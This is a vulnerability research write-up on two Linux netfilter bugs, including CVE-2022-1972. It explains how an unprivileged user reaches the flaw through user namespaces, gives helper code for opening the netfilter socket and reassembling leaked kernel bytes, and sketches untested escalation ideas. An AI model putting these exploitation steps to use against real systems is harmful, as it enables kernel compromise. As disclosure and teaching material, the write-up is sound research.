This year, I did my end-of-study internship at Randorisec. Its original purpose was to study different ways of doing variant analysis on open-source projects as well as on closed-source software. The Linux kernel is an attractive target, so it was chosen as the target of my project. I started by looking for publicly disclosed bugs that could lead to interesting variant patterns. Since the beginning of the year, several bugs have been found and fixed in the netfilter kernel component, such as CVE-2022-1015. In this article, I am going to talk about two bugs I found in the netfilter part of the kernel. One of them leads to an information leak, and potentially to a fully functional local privilege escalation (LPE) exploit.
A brief introduction to netfilter
Netfilter is an open-source project used to perform packet filtering; it is the firewall of Linux.
It is often associated with iptables, the userland application used to configure the firewall.
In 2014, a new subsystem called nf_tables was added to netfilter; it is configured through the nftables userland application.
The core logic of netfilter is implemented within the kernel (/net/netfilter), and the userland tools communicate with it via netlink messages.
A VERY basic usage
The central object of netfilter is the table.
It contains all the information about a filter.
The following nftables command creates a new table named my-table that can be used as a filter on the IP protocol.
nft> add table ip my-table
A table can contain different objects, such as sets, which are used to store data.
The following command creates a new set named my-set, associated with the table my-table, that stores IPv4 addresses.
nft> add set ip my-table my-set { type ipv4_addr; }
Finally, we can create chains of rules that are applied to the received packets.
Starting point
In April 2022, David Bouman released an article about vulnerabilities in the Linux kernel.
I focused on CVE-2022-1015, which became the starting point of my variant analysis.
This vulnerability is very interesting because it is an out-of-bounds access caused by poorly implemented checks on user input.
Moreover, this kind of bug can be found both in the Linux kernel and in userland applications.
The bug behind this vulnerability is an integer overflow located in the function nft_validate_register_load (/net/netfilter/nf_tables_api.c), at (0).
static int nft_validate_register_load(enum nft_registers reg, unsigned int len)
{
if (reg < NFT_REG_1 * NFT_REG_SIZE / NFT_REG32_SIZE)
return -EINVAL;
if (len == 0)
return -EINVAL;
if (reg * NFT_REG32_SIZE + len > sizeof_field(struct nft_regs, data)) <===== (0)
return -ERANGE;
return 0;
}
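To make the overflow at (0) concrete, here is a minimal user-space model of the check. It is only a sketch: the constant values (NFT_REG_1 = 1, NFT_REG_SIZE = 16, NFT_REG32_SIZE = 4, and an 80-byte register file) are assumptions about the kernel headers, and the function name is hypothetical.

```c
#include <errno.h>
#include <stdint.h>

/* Assumed values; check them against the kernel headers you target. */
#define NFT_REG_1        1u
#define NFT_REG_SIZE     16u
#define NFT_REG32_SIZE   4u
#define NFT_REGS_DATA_SZ 80u   /* assumption: 20 registers of 4 bytes */

/* User-space model of the check; all arithmetic is 32-bit unsigned. */
int model_validate_register_load(uint32_t reg, uint32_t len)
{
    if (reg < NFT_REG_1 * NFT_REG_SIZE / NFT_REG32_SIZE)
        return -EINVAL;
    if (len == 0)
        return -EINVAL;
    /* reg * 4 can wrap around 2^32 before the comparison is made. */
    if (reg * NFT_REG32_SIZE + len > NFT_REGS_DATA_SZ)
        return -ERANGE;
    return 0;
}
```

With these assumptions, a register index such as 0x40000004 wraps to a small offset and passes the check, while an honest but too large index such as 100 is rejected with -ERANGE.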
After reading and understanding how this vulnerability works, I decided to write a CodeQL query able to find similar vulnerabilities. Analyzing the results of the query led to several candidate variants of CVE-2022-1015.
CVE-2022-1015 variant
The bug
One of these candidates caught my attention. It is located in the function nft_set_desc_concat_parse (/net/netfilter/nf_tables_api.c).
static int nft_set_desc_concat_parse(const struct nlattr *attr,
struct nft_set_desc *desc)
{
struct nlattr *tb[NFTA_SET_FIELD_MAX + 1];
u32 len;
int err;
err = nla_parse_nested_deprecated(tb, NFTA_SET_FIELD_MAX, attr,
nft_concat_policy, NULL);
if (err < 0)
return err;
if (!tb[NFTA_SET_FIELD_LEN])
return -EINVAL;
len = ntohl(nla_get_be32(tb[NFTA_SET_FIELD_LEN]));
if (len * BITS_PER_BYTE / 32 > NFT_REG32_COUNT) <===== (1)
return -E2BIG;
desc->field_len[desc->field_count++] = len; <===== (2)
return 0;
}
At (1), we recognize the pattern matched by the query.
Let’s focus on the left-hand side of the comparison, len * BITS_PER_BYTE / 32.
len is a 32-bit integer extracted from a netlink message with nla_get_be32, so we can assume that it is user-controllable.
The macro BITS_PER_BYTE is defined in /include/linux/bits.h.
#define BITS_PER_BYTE 8
The multiplication len * BITS_PER_BYTE results in a left shift by three bits.
The next arithmetic operation is the division by 32, which results in a right shift by five bits.
In other words, five bits of len are ignored: the three most significant and the two least significant.
Now, let’s have a look at the right-hand side of the comparison.
The macro NFT_REG32_COUNT is defined in the file /include/uapi/linux/netfilter/nf_tables.h.
enum nft_registers {
...
NFT_REG32_00 = 8,
NFT_REG32_01,
NFT_REG32_02,
NFT_REG32_03,
NFT_REG32_04,
NFT_REG32_05,
NFT_REG32_06,
NFT_REG32_07,
NFT_REG32_08,
NFT_REG32_09,
NFT_REG32_10,
NFT_REG32_11,
NFT_REG32_12,
NFT_REG32_13,
NFT_REG32_14,
NFT_REG32_15,
};
...
#define NFT_REG32_COUNT (NFT_REG32_15 - NFT_REG32_00 + 1)
NFT_REG32_COUNT is therefore equal to 23 - 8 + 1 = 16.
If we invert the condition at (1) to get a condition on len, and leave the overflow aside, we get len / 4 <= 16, that is len <= 67.
Nevertheless, five bits are ignored in this comparison, so these five bits could be used to store an unwanted value at (2).
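The bit arithmetic behind the check at (1) can be sketched in user space as follows. The function names are hypothetical; the two constants are the ones quoted above, and the arithmetic is done on 32-bit unsigned integers as in the kernel.

```c
#include <stdbool.h>
#include <stdint.h>

#define BITS_PER_BYTE   8u
#define NFT_REG32_COUNT 16u

/* Left-hand side of the comparison at (1), in 32-bit unsigned arithmetic. */
uint32_t concat_check_lhs(uint32_t len)
{
    return len * BITS_PER_BYTE / 32;
}

/* Same value written as a mask: bits 29..31 and bits 0..1 of len vanish. */
uint32_t concat_check_lhs_masked(uint32_t len)
{
    return (len & 0x1FFFFFFFu) >> 2;
}

/* True when the check at (1) lets len through. */
bool concat_len_accepted(uint32_t len)
{
    return !(concat_check_lhs(len) > NFT_REG32_COUNT);
}
```

For instance, 67 is accepted and 68 is rejected, but 0xE0000043 is accepted as well, because its three high bits are lost in the multiplication.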
The next step is to find a way for a random unprivileged user to reach this buggy code.
Unprivileged access
The netfilter kernel module can be reached through a netlink socket defined in /net/netfilter/nfnetlink.c.
static int __net_init nfnetlink_net_init(struct net *net)
{
struct nfnl_net *nfnlnet = nfnl_pernet(net);
struct netlink_kernel_cfg cfg = {
.groups = NFNLGRP_MAX,
.input = nfnetlink_rcv, <===== (3)
#ifdef CONFIG_MODULES
.bind = nfnetlink_bind,
#endif
};
nfnlnet->nfnl = netlink_kernel_create(net, NETLINK_NETFILTER, &cfg);
if (!nfnlnet->nfnl)
return -ENOMEM;
return 0;
}
The input field of the netlink_kernel_cfg structure, at (3), gives us the function that is called when a message is received on the netfilter netlink socket.
Let’s have a look at this handler.
static void nfnetlink_rcv(struct sk_buff *skb)
{
struct nlmsghdr *nlh = nlmsg_hdr(skb);
if (skb->len < NLMSG_HDRLEN ||
nlh->nlmsg_len < NLMSG_HDRLEN ||
skb->len < nlh->nlmsg_len)
return;
if (!netlink_net_capable(skb, CAP_NET_ADMIN)) { <===== (4)
netlink_ack(skb, nlh, -EPERM, NULL);
return;
}
if (nlh->nlmsg_type == NFNL_MSG_BATCH_BEGIN)
nfnetlink_rcv_skb_batch(skb, nlh);
else
netlink_rcv_skb(skb, nfnetlink_rcv_msg);
}
We see a capability check at (4), done by the function netlink_net_capable: the user must have the CAP_NET_ADMIN capability to use netfilter.
Luckily for us, this capability can be acquired through user namespaces (CONFIG_USER_NS).
User namespaces have been a game changer in Linux kernel exploitation over the past few years, as they have opened up a new set of attack surfaces.
This is kind of funny, because they are also used to sandbox applications: a good example of a double-edged sword.
Back to our topic: the call path from nfnetlink_rcv to nft_set_desc_concat_parse can be mapped as follows.
nfnetlink_rcv
nfnetlink_rcv_skb_batch
nfnetlink_rcv_batch
nf_tables_newset
nf_tables_set_desc_parse
nft_set_desc_concat
nft_set_desc_concat_parse
There is no relevant information in the intermediate functions, so we are going to ignore them for the moment.
If the kernel is compiled with CONFIG_USER_NS enabled, we are able to reach the vulnerable code path.
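As an illustration of this access path, the sketch below enters a new user namespace together with a new network namespace, then opens a netlink socket on the netfilter subsystem. It is not taken from my PoC: the function names are hypothetical, the raw syscall is used only to keep the example independent of feature-test macros, and it assumes that unprivileged user namespaces are allowed on the system.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <string.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <linux/netlink.h>   /* NETLINK_NETFILTER, struct sockaddr_nl */
#include <linux/sched.h>     /* CLONE_NEWUSER, CLONE_NEWNET */

/* New user and network namespaces: the caller holds CAP_NET_ADMIN
 * over the network namespace created here. */
#define NS_FLAGS (CLONE_NEWUSER | CLONE_NEWNET)

/* Returns 0 on success, -1 (errno set) if the kernel refuses. */
int enter_namespaces(void)
{
    return (int)syscall(SYS_unshare, NS_FLAGS);
}

/* Opens and binds a netlink socket on the netfilter subsystem.
 * Returns the file descriptor, or -1 on error. */
int open_nfnetlink(void)
{
    struct sockaddr_nl addr;
    int fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_NETFILTER);

    if (fd < 0)
        return -1;
    memset(&addr, 0, sizeof(addr));
    addr.nl_family = AF_NETLINK;
    if (bind(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}
```

A caller would typically invoke enter_namespaces() first, then open_nfnetlink(), and send its batch of nf_tables messages on the returned descriptor.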
Well, what can we do?
Sadly, it seems that this bug does not have any impact on the security of Linux.
Indeed, the assignment at (2) hides a cast from a 32-bit unsigned integer to an 8-bit one, because the field field_len of the nft_set_desc structure is an array of u8.
struct nft_set_desc {
unsigned int klen;
unsigned int dlen;
unsigned int size;
u8 field_len[NFT_REG32_COUNT];
u8 field_count;
bool expr;
};
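This greatly reduces the power of the overflow: the three most significant bits are lost in the cast, so only the two least significant bits escape the check, and the stored value can never exceed 67.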
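The effect of the cast can be checked with a small user-space model of (1) followed by (2). This is a sketch with hypothetical function names; it only enumerates the three ignored high bits combined with every 16-bit low part, which is enough because any higher bit set between bit 16 and bit 28 makes the check fail.

```c
#include <stdint.h>

/* Model of (1) followed by (2): returns the byte that ends up in
 * field_len, or -1 when the check rejects len. */
int store_if_accepted(uint32_t len)
{
    if (len * 8u / 32u > 16u)
        return -1;
    return (uint8_t)len;   /* narrowing to u8, as in the assignment at (2) */
}

/* Largest byte that can be stored, over every pattern of the three
 * ignored high bits and every 16-bit low part. */
int max_stored_byte(void)
{
    int best = -1;

    for (uint32_t top = 0; top < 8; top++) {
        for (uint32_t low = 0; low <= 0xFFFFu; low++) {
            int v = store_if_accepted((top << 29) | low);

            if (v > best)
                best = v;
        }
    }
    return best;
}
```

Under this model, the high bits never reach the stored byte, and the only values above 64 that survive are those using the two low bits.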
A strange neighbor
However, this is not the end of the adventure.
While I was trying to exploit the previous bug, something caught my attention: there is no check on the index field_count before the assignment at (2).
The parent function of nft_set_desc_concat_parse is nft_set_desc_concat (/net/netfilter/nf_tables_api.c).
static int nft_set_desc_concat(struct nft_set_desc *desc,
const struct nlattr *nla)
{
struct nlattr *attr;
int rem, err;
nla_for_each_nested(attr, nla, rem) { <===== (5)
if (nla_type(attr) != NFTA_LIST_ELEM)
return -EINVAL;
err = nft_set_desc_concat_parse(attr, desc); <===== (6)
if (err < 0)
return err;
}
return 0;
}
The call to nft_set_desc_concat_parse is made at (6), but the most interesting thing is that this call is located in a loop that starts at (5), and the loop body does not verify the value of desc->field_count.
nla_for_each_nested loops over all the netlink attributes provided by the user; if the user provides more than NFT_REG32_COUNT of them, a buffer overflow happens.
Gimme gimme gimme an infoleak …
We will now see how to turn this buffer overflow into a kernel infoleak.
The first byte to be overwritten is the field field_count, which stores the number of elements held in the field field_len.
We will use this field to reach our goal.
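The layout claim can be verified with a user-space mirror of the nft_set_desc structure quoted earlier. This is a sketch: the mirror and the helper names are hypothetical, and the padding at the end of the structure depends on the ABI (the figures given below assume a common 64-bit Linux target).

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define NFT_REG32_COUNT 16

/* User-space mirror of struct nft_set_desc, field for field. */
struct desc_mirror {
    unsigned int klen;
    unsigned int dlen;
    unsigned int size;
    uint8_t field_len[NFT_REG32_COUNT];
    uint8_t field_count;
    bool expr;
};

/* Byte offset, inside the structure, hit by a write to field_len[idx]. */
size_t field_len_write_offset(size_t idx)
{
    return offsetof(struct desc_mirror, field_len) + idx;
}

/* First field_len index that lies past the end of the structure. */
size_t first_index_past_struct(void)
{
    return sizeof(struct desc_mirror) - offsetof(struct desc_mirror, field_len);
}
```

Index 16 lands exactly on field_count and index 17 on expr. With two bytes of trailing padding, index 20 is the first one outside the structure.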
Netfilter sets
We will use netfilter sets, represented by the structure nft_set (/include/net/netfilter/nf_tables.h).
struct nft_set {
struct list_head list;
struct list_head bindings;
struct nft_table *table;
possible_net_t net;
char *name;
u64 handle;
u32 ktype;
u32 dtype;
u32 objtype;
u32 size;
u8 field_len[NFT_REG32_COUNT];
u8 field_count;
u32 use;
atomic_t nelems;
u32 ndeact;
u64 timeout;
u32 gc_int;
u16 policy;
u16 udlen;
unsigned char *udata;
/* runtime data below here */
const struct nft_set_ops *ops ____cacheline_aligned;
u16 flags:14,
genmask:2;
u8 klen;
u8 dlen;
u8 num_exprs;
struct nft_expr *exprs[NFT_SET_EXPR_MAX];
struct list_head catchall_list;
unsigned char data[]
__attribute__((aligned(__alignof__(u64))));
};
These sets are allocated in the function nf_tables_newset (/net/netfilter/nf_tables_api.c), which is a parent of the vulnerable function nft_set_desc_concat_parse.
static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
const struct nlattr * const nla[])
{
const struct nft_set_ops *ops;
struct nft_set_desc desc;
struct nft_set *set;
size_t alloc_size;
u64 size;
...
memset(&desc, 0, sizeof(desc)); <===== (7)
...
if (nla[NFTA_SET_DESC] != NULL) {
err = nf_tables_set_desc_parse(&desc, nla[NFTA_SET_DESC]); <===== (8)
if (err < 0)
return err;
}
...
size = 0;
if (ops->privsize != NULL)
size = ops->privsize(nla, &desc);
alloc_size = sizeof(*set) + size + udlen;
if (alloc_size < size || alloc_size > INT_MAX)
return -ENOMEM;
set = kvzalloc(alloc_size, GFP_KERNEL); <===== (9)
if (!set)
return -ENOMEM;
...
set->field_count = desc.field_count;
for (i = 0; i < desc.field_count; i++) <===== (10)
set->field_len[i] = desc.field_len[i];
...
}
At (8), we find the call that leads to the vulnerable function.
Its first argument is the address of the local variable desc, which is initialized at (7).
This is the object that is modified in the function nft_set_desc_concat_parse.
We can see that its fields field_count and field_len are used at (10), where they are stored into the nft_set freshly allocated at (9).
So, if the out-of-bounds write has been used to overwrite only the field field_count of desc with a value bigger than 20 (end of the structure plus alignment), some data from the stack will be copied into the nft_set structure at (10).
In this case, it will also produce an out-of-bounds write inside the nft_set structure, but that is not useful for our leak.
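The copy at (10) can be modeled with a toy stack frame, where desc sits at offset 0 and is followed by other locals. Everything here is an assumption made for illustration: the offsets (12 for field_len, 32 for the size of the structure), the frame size, and the function name. The bounds checks only exist to keep the model memory-safe; the kernel loop has none.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define FIELD_LEN_OFF 12   /* assumed offset of field_len inside nft_set_desc */
#define DESC_SIZE     32   /* assumed sizeof(struct nft_set_desc) */
#define FRAME_SIZE    64   /* toy stack frame: desc followed by other locals */

/*
 * Model of the loop at (10): copies field_count bytes starting at
 * desc.field_len, without caring where the structure ends.
 * Returns the number of bytes copied into out.
 */
size_t copy_fields(const uint8_t frame[FRAME_SIZE], uint8_t field_count,
                   uint8_t *out, size_t out_size)
{
    size_t i;

    for (i = 0; i < field_count; i++) {
        /* Bounds checks exist only to keep this model memory-safe. */
        if (i >= out_size || FIELD_LEN_OFF + i >= FRAME_SIZE)
            break;
        out[i] = frame[FIELD_LEN_OFF + i];
    }
    return i;
}
```

If the bytes located right after desc in the frame hold a secret, a field_count of 28 copies eight of them into out, starting at index 20.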
Back to the userland
The next step is to find a way to send this information back to userland.
To do so, we will use the function nf_tables_getset (/net/netfilter/nf_tables_api.c), which can be reached in a similar way to nf_tables_newset.
nf_tables_getset can be used to retrieve information about a registered set.
static int nf_tables_getset(struct sk_buff *skb, const struct nfnl_info *info,
const struct nlattr * const nla[])
{
const struct nft_set *set;
struct sk_buff *skb2;
struct nft_ctx ctx;
int err;
...
skb2 = alloc_skb(NLMSG_GOODSIZE, GFP_ATOMIC);
if (skb2 == NULL)
return -ENOMEM;
err = nf_tables_fill_set(skb2, &ctx, set, NFT_MSG_NEWSET, 0); <===== (11)
if (err < 0)
goto err_fill_set_info;
return nfnetlink_unicast(skb2, net, NETLINK_CB(skb).portid); <===== (12)
}
This function sends data to userland through the netfilter netlink socket thanks to nfnetlink_unicast at (12), and this data is set up by the call to nf_tables_fill_set (/net/netfilter/nf_tables_api.c) at (11).
static int nf_tables_fill_set(struct sk_buff *skb, const struct nft_ctx *ctx,
const struct nft_set *set, u16 event, u16 flags)
{
struct nlmsghdr *nlh;
u32 portid = ctx->portid;
struct nlattr *nest;
u32 seq = ctx->seq;
int i;
event = nfnl_msg_type(NFNL_SUBSYS_NFTABLES, event);
nlh = nfnl_msg_put(skb, portid, seq, event, flags, ctx->family,
NFNETLINK_V0, nft_base_seq(ctx->net));
...
if (set->udata &&
nla_put(skb, NFTA_SET_USERDATA, set->udlen, set->udata))
goto nla_put_failure;
...
if (set->field_count > 1 &&
nf_tables_fill_set_concat(skb, set)) <===== (13)
goto nla_put_failure;
...
nlmsg_end(skb, nlh);
return 0;
nla_put_failure:
nlmsg_trim(skb, nlh);
return -1;
}
At (13), another auxiliary function is used to handle the data of the fields field_len and field_count of the nft_set structure.
static int nf_tables_fill_set_concat(struct sk_buff *skb,
const struct nft_set *set)
{
struct nlattr *concat, *field;
int i;
concat = nla_nest_start_noflag(skb, NFTA_SET_DESC_CONCAT);
if (!concat)
return -ENOMEM;
for (i = 0; i < set->field_count; i++) { <===== (14)
field = nla_nest_start_noflag(skb, NFTA_LIST_ELEM);
if (!field)
return -ENOMEM;
if (nla_put_be32(skb, NFTA_SET_FIELD_LEN, <===== (15)
htonl(set->field_len[i])))
return -ENOMEM;
nla_nest_end(skb, field);
}
nla_nest_end(skb, concat);
return 0;
}
As we can see at (14), we iterate set->field_count times and, at each iteration, one element of the set->field_len buffer is added to the socket buffer at (15).
So, if the off-by-one overflow has been triggered at (2) as explained previously, information stored on the stack is copied to the heap at (10) and, finally, the user is able to read it through the netlink socket.
My PoC produces such a leak: in these specific circumstances, it discloses a stack canary and an address of the data section.
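On the receiving side, each NFTA_SET_FIELD_LEN attribute carries one byte of set->field_len, widened to a 32-bit value in network byte order at (15). A minimal sketch of how eight consecutive leaked bytes could be reassembled into a 64-bit word is given below. The function name is hypothetical, the attribute payloads are assumed to have already been extracted from the netlink reply, and the little-endian reassembly assumes a target such as x86-64.

```c
#include <arpa/inet.h>   /* ntohl */
#include <stddef.h>
#include <stdint.h>

/*
 * vals: NFTA_SET_FIELD_LEN payloads as received (network byte order).
 * Rebuilds a 64-bit little-endian word from 8 consecutive leaked bytes
 * starting at index first. Returns 0 if fewer than 8 values remain.
 */
uint64_t leaked_qword(const uint32_t *vals, size_t count, size_t first)
{
    uint64_t word = 0;
    size_t i;

    if (first > count || count - first < 8)
        return 0;
    for (i = 0; i < 8; i++) {
        /* Only the low byte is meaningful: field_len elements are u8. */
        uint8_t byte = (uint8_t)ntohl(vals[first + i]);

        word |= (uint64_t)byte << (8 * i);
    }
    return word;
}
```

A candidate stack canary or pointer can then be read by calling this helper at the index where the leaked stack data starts.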
Limitations
We have seen that the out-of-bounds write can lead to an infoleak. However, this leak is not very powerful, because it is restricted to 28 bytes by the layout of the nft_set structure.
Indeed, a bigger leak would require overwriting the least significant bytes of the field udata, which can lead to a segmentation fault in the nf_tables_fill_set function.
Moreover, the leak depends on the stack layout, which itself depends on how the kernel was compiled, so it can provide interesting information on one specific kernel and be useless on the next version.
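One plausible way to account for these 28 bytes is to measure the distance between field_len and udata in nft_set, then subtract the 20 bytes that still belong to nft_set_desc on the stack. The mirror below is a sketch under several assumptions: a 64-bit target, possible_net_t holding a single pointer, atomic_t wrapping an int, and 20 bytes between the start of desc.field_len and the end of desc. All names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

struct list_head_mirror { void *next, *prev; };

/* Partial mirror of struct nft_set, up to and including udata. */
struct nft_set_mirror {
    struct list_head_mirror list;
    struct list_head_mirror bindings;
    void *table;
    void *net;            /* assumption: possible_net_t holds one pointer */
    char *name;
    uint64_t handle;
    uint32_t ktype, dtype, objtype, size;
    uint8_t field_len[16];
    uint8_t field_count;
    uint32_t use;
    int32_t nelems;       /* assumption: atomic_t wraps an int */
    uint32_t ndeact;
    uint64_t timeout;
    uint32_t gc_int;
    uint16_t policy;
    uint16_t udlen;
    unsigned char *udata;
};

/* Assumed: bytes from desc.field_len to the end of struct nft_set_desc. */
#define DESC_BYTES_FROM_FIELD_LEN 20

/* Bytes that can be written from field_len before touching udata. */
size_t bytes_before_udata(void)
{
    return offsetof(struct nft_set_mirror, udata) -
           offsetof(struct nft_set_mirror, field_len);
}

/* Stack bytes that can be leaked without corrupting udata. */
size_t leak_budget(void)
{
    return bytes_before_udata() - DESC_BYTES_FROM_FIELD_LEN;
}
```

Under these assumptions, 48 bytes separate field_len from udata, which leaves 48 - 20 = 28 bytes of stack data.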
Remediation
I did not manage to turn this out-of-bounds write into a fully functional LPE exploit before it was publicly disclosed and fixed. It was fixed on 31 May 2022 by the commit fecf31ee395b0295f2d7260aa29946b7605f7c85. This commit fixes both the integer overflow and the out-of-bounds write. The patch for the integer overflow allows a length of up to 255, which would have facilitated the exploitation of the vulnerability.
This vulnerability has been officially disclosed on oss-security, and CVE-2022-1972 has been assigned to it.
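The two checks that such a fix needs can be sketched in user space as follows. This is not the verbatim patch: the structure, the function name, and the rejection of a zero length are assumptions made for illustration. It only shows a length limited to what fits in a u8 and an index bounded by the size of field_len.

```c
#include <errno.h>
#include <stdint.h>

#define NFT_REG32_COUNT 16

/* Reduced model of the two fields touched by the parser. */
struct desc_model {
    uint8_t field_len[NFT_REG32_COUNT];
    uint8_t field_count;
};

/* Appends one field length, rejecting anything that would not fit. */
int desc_add_field(struct desc_model *desc, uint32_t len)
{
    /* The value must survive the narrowing to u8 unchanged. */
    if (len == 0 || len > UINT8_MAX)
        return -EINVAL;
    /* The index must stay inside field_len. */
    if (desc->field_count >= NFT_REG32_COUNT)
        return -E2BIG;
    desc->field_len[desc->field_count++] = (uint8_t)len;
    return 0;
}
```

With these checks, a seventeenth field is refused instead of overwriting field_count.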
Say LPE again! I dare you!
The nft_set structure stores several pointers, making it a good place to start.
The field udata stores the address of the end of the structure, that is, the address of the field data.
If some data is stored in the field data, the number of bytes stored there is kept in the udlen field.
The write primitive makes it possible to overwrite this field, which could lead to a heap infoleak.
From this leak, we can imagine getting pointers from different caches.
We can also try to obtain an arbitrary free primitive with an overflow that reaches the field num_exprs of the structure nft_set and sets it to a value bigger than 5 (NFT_SET_EXPR_MAX = 2).
As a result, part of the field data would also be treated as part of the field exprs, and we would obtain full control over the stored exprs.
We would then just have to find a way to call nft_expr_destroy.
To do that, we may try to trigger an error in the handling of the expressions, just after the out-of-bounds write inside the nft_set structure.
By combining these techniques, we should be able to get an arbitrary free primitive and try to produce a use-after-free.
All of this is hypothetical as it has not been tested, so it may or may not work.
Conclusion
To sum up, I found two bugs in the kernel part of netfilter, which lead to a 28-byte infoleak. They could not be turned into a privilege escalation because of a lack of time and a weak write primitive (each written byte cannot exceed 67). All the sources of my PoC can be found on our GitHub.